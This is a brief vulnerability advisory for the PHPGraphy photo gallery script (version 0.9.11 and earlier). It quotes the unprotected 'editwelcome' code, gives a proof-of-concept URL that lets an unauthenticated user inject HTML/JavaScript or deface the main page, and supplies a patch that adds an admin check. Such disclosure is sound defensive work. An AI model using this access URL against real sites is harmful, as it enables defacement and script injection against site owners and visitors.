- PHPGraphy <= 0.9.11 "editwelcome" unauthorized access / cross site scripting - -------------------------------- software site: http://phpgraphy.sourceforge.net/ description: "Full featured photo gallery PHP script - Light, fast and easy to install" vulnerable code index.php near line 503-10: ... if ($updwelcome && isset($welcomedata) && check_welcome($dir)) { if (strlen($welcomedata) < 10000) { write_welcome($dir,$welcomedata); echo "<html><script language=\"javascript\">window.opener.location=\"?dir=".rawurlencode($dir)."\";window.close();</script></html>"; } else echo "Sorry more data (10k) than allowed, protection aborting the operation<br />"; exit; } ... poc, a remote user can go to this url: http://[target]/[path]/index.php?dir=&editwelcome=1&popup=0 to have unauthorized access to some edit functionalities and to insert html/ /javascript code or simply deface the main page temporary patch -> replace this line: ... if ($updwelcome && isset($welcomedata) && check_welcome($dir)) { ... with: ... if ($admin && $updwelcome && isset($welcomedata) && check_welcome($dir)) { ... -------------------------------------------------------------------------------- rgod site: http://retrogod.altervista.org mail: rgod at autistici.org original advisory: http://retrogod.altervista.org/phpgraphy_0911_adv.html --------------------------------------------------------------------------------